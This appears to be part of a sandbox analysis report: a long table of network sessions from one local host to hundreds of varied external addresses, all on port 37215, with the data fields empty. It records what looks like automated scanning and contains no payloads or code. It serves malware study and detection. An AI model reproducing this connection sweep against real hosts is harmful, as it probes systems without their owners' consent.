                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25590192.168.2.1546540156.164.141.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25591192.168.2.1545816156.164.29.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25592192.168.2.1555548156.240.23.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25593192.168.2.1558724156.44.213.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25594192.168.2.1537772156.136.94.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25595192.168.2.1548100156.3.166.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25596192.168.2.1546754156.65.81.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25597192.168.2.1539198156.148.17.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25598192.168.2.1538934156.31.79.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25599192.168.2.1555644156.68.128.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25600192.168.2.1540058156.69.183.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25601192.168.2.1552992156.82.5.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25602192.168.2.1556636156.88.204.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25603192.168.2.1540134156.45.22.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25604192.168.2.1540038156.85.215.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25605192.168.2.1535208156.122.63.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25606192.168.2.1559942156.131.63.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25607192.168.2.1542996156.117.138.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25608192.168.2.1549514156.238.23.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25609192.168.2.1536036156.35.180.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25610192.168.2.1540326156.161.144.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25611192.168.2.1541772156.1.173.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25612192.168.2.1552042156.33.208.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25613192.168.2.1549434156.172.179.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25614192.168.2.1547870156.117.234.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25615192.168.2.1540976156.207.47.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25616192.168.2.1533826156.183.76.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25617192.168.2.1549116156.142.191.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25618192.168.2.1555884156.27.249.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25619192.168.2.1538614156.137.229.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25620192.168.2.1556774156.174.9.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25621192.168.2.1547938156.11.24.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25622192.168.2.1538052156.89.117.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25623192.168.2.1536012156.29.131.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25624192.168.2.1559672156.143.19.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25625192.168.2.1546906156.73.127.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25626192.168.2.1560992156.234.173.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25627192.168.2.1548398156.209.34.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25628192.168.2.1556548156.141.82.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25629192.168.2.1548004156.56.19.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25630192.168.2.1557028156.180.223.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25631192.168.2.1558518156.249.5.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25632192.168.2.1535276156.3.52.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25633192.168.2.1554054156.1.60.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25634192.168.2.1552532156.8.34.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25635192.168.2.1559166156.128.176.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25636192.168.2.1541082156.120.170.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25637192.168.2.1555288156.211.53.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25638192.168.2.1553540156.102.219.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25639192.168.2.1556714156.38.56.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25640192.168.2.1537710156.82.191.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25641192.168.2.1546382156.110.164.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25642192.168.2.1536612156.155.179.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25643192.168.2.1533316156.210.19.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25644192.168.2.1555482156.96.226.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25645192.168.2.154375641.22.1.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25646192.168.2.155434041.25.173.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25647192.168.2.155261841.160.11.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25648192.168.2.155981441.10.11.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25649192.168.2.155848241.148.76.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25650192.168.2.154781241.179.210.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25651192.168.2.155208441.32.201.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25652192.168.2.154511041.221.226.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25653192.168.2.154470641.163.60.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25654192.168.2.153946441.93.8.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25655192.168.2.155832041.235.105.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25656192.168.2.155003641.136.78.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25657192.168.2.154307041.249.13.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25658192.168.2.154472641.152.148.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25659192.168.2.153541641.237.186.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25660192.168.2.155464441.55.95.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25661192.168.2.155030641.222.56.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25662192.168.2.153631441.154.96.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25663192.168.2.153627841.251.104.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25664192.168.2.153979441.133.1.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25665192.168.2.155877441.10.208.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25666192.168.2.155263041.224.149.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25667192.168.2.153686241.59.65.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25668192.168.2.153940441.140.192.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25669192.168.2.153317641.50.142.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25670192.168.2.154663241.219.42.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25671192.168.2.154825841.172.189.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25672192.168.2.155928441.188.39.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25673192.168.2.155043641.24.159.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25674192.168.2.156035641.206.26.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25675192.168.2.155913841.236.204.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25676192.168.2.155173241.127.202.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25677192.168.2.153749241.200.78.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25678192.168.2.155349841.65.62.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25679192.168.2.154112841.114.237.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25680192.168.2.153905041.129.213.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25681192.168.2.155289441.173.139.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25682192.168.2.155717641.211.41.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25683192.168.2.153353641.57.51.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25684192.168.2.155542441.141.2.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25685192.168.2.154941441.79.158.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25686192.168.2.154969841.157.131.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25687192.168.2.154691441.106.190.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25688192.168.2.154113641.38.254.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25689192.168.2.154848241.33.63.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25690192.168.2.155833641.19.22.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25691192.168.2.155068441.52.189.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25692192.168.2.153355641.41.244.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25693192.168.2.154196641.59.152.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25694192.168.2.155009441.151.121.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25695192.168.2.153395241.25.28.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25696192.168.2.153628641.176.83.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25697192.168.2.155368241.0.241.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25698192.168.2.154466041.104.89.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25699192.168.2.155003641.239.162.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25700192.168.2.153403841.223.104.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25701192.168.2.154554041.144.213.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25702192.168.2.155181841.96.2.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25703192.168.2.154866441.75.180.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25704192.168.2.155775841.178.97.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25705192.168.2.155666841.16.208.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25706192.168.2.155152641.150.15.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25707192.168.2.154110441.220.83.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25708192.168.2.154615441.214.45.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25709192.168.2.156070241.99.160.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25710192.168.2.154664841.205.74.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25711192.168.2.154295441.139.129.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25712192.168.2.156097441.99.149.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25713192.168.2.155056041.253.82.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25714192.168.2.155634441.219.177.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25715192.168.2.156047041.106.222.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25716192.168.2.153761641.131.243.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25717192.168.2.154462441.26.59.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25718192.168.2.154997441.86.100.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25719192.168.2.153343841.230.173.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25720192.168.2.154225441.117.179.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25721192.168.2.153913441.151.151.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25722192.168.2.155551441.230.179.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25723192.168.2.153465641.30.17.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25724192.168.2.154788841.228.167.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25725192.168.2.154775241.160.193.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25726192.168.2.153692441.94.201.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25727192.168.2.154433641.183.176.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25728192.168.2.154103641.124.126.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25729192.168.2.155013841.158.194.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25730192.168.2.154245241.164.169.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25731192.168.2.154887841.245.56.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25732192.168.2.155887041.209.241.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25733192.168.2.154978441.228.239.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25734192.168.2.154516041.138.35.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25735192.168.2.154123041.230.56.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25736192.168.2.153313841.21.117.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25737192.168.2.153579641.203.148.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25738192.168.2.153755841.0.226.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25739192.168.2.155656841.166.101.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25740192.168.2.155151041.9.124.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25741192.168.2.155353841.93.219.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25742192.168.2.155145041.159.63.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25743192.168.2.153549241.190.235.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25744192.168.2.155059441.218.213.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25745192.168.2.155940041.186.98.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25746192.168.2.155404441.116.113.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25747192.168.2.153708241.80.85.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25748192.168.2.154918841.35.186.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25749192.168.2.154733841.254.75.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25750192.168.2.155197041.141.202.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25751192.168.2.154439641.92.152.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25752192.168.2.154781241.80.64.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25753192.168.2.153751041.125.211.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25754192.168.2.155756041.98.137.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25755192.168.2.154407441.69.48.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25756192.168.2.155538641.214.69.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25757192.168.2.153858241.178.67.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25758192.168.2.155981641.9.50.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25759192.168.2.154075041.18.59.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25760192.168.2.154438241.147.166.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25761192.168.2.155967041.196.200.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25762192.168.2.155687241.108.82.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25763192.168.2.154528641.222.128.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25764192.168.2.154241841.213.110.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25765192.168.2.153297641.74.207.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25766192.168.2.155271641.252.57.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25767192.168.2.154545241.166.217.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25768192.168.2.154576241.32.51.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25769192.168.2.155509841.28.117.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25770192.168.2.153881041.149.188.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25771192.168.2.154844041.254.232.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25772192.168.2.155083841.48.20.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25773192.168.2.154775841.32.210.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25774192.168.2.154359441.122.0.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25775192.168.2.155854241.185.7.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25776192.168.2.153408041.214.6.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25777192.168.2.155474841.10.64.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25778192.168.2.154272641.141.191.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25779192.168.2.155476241.85.134.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25780192.168.2.156033841.177.123.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25781192.168.2.155990641.98.153.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25782192.168.2.154207841.238.238.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25783192.168.2.154599041.125.110.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25784192.168.2.153468041.19.73.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25785192.168.2.153450241.13.92.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25786192.168.2.155993241.252.204.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25787192.168.2.153814441.245.69.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25788192.168.2.154178241.208.69.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25789192.168.2.154398841.163.202.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25790192.168.2.153747641.23.242.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25791192.168.2.155864241.147.32.14737215
                                                                            TimestampBytes transferredDirectionData


